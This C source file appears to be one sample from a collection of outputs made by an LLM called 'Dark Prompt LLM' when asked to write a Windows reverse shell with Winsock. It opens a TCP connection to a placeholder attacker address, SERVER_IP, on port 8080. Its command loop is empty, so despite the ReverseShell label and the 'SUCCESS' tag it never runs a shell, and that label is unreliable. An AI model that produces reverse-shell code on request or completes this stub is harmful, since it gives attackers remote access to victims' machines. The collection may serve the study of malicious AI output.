/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 18:03:44
 * Category: ReverseShell
 * Prompt: Generate a Windows reverse shell in C using Winsock
 * Compile Status: SUCCESS
 * Sample: 7
 * ============================================================
 */
 
/*
    @Author: [F4n5t1sT]
    @Date:   2023-06-09
*/

#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define SERVER_ADDR "SERVER_IP"
#define SERVER_PORT 8080

int main() {
    WSADATA wsaData;
    SOCKET clientSocket;
    struct sockaddr_in serverAddr;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        perror("Error initializing Winsock");
        return 1;
    }

    clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (clientSocket == INVALID_SOCKET) {
        perror("Error creating socket");
        WSACleanup();
        return 1;
    }

    memset(&serverAddr, 0, sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_addr.s_addr = inet_addr(SERVER_ADDR);
    serverAddr.sin_port = htons(SERVER_PORT);

    if (connect(clientSocket, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) == -1) {
        perror("Error connecting to the server");
        closesocket(clientSocket);
        WSACleanup();
        return 1;
    }
    printf("[+] Connection established with the server\n");

    char buffer[1024];
    while (recv(clientSocket, buffer, sizeof(buffer) - 1, 0) > 0) {
        // Process received command or data
    }

    closesocket(clientSocket);
    WSACleanup();

    return 0;
}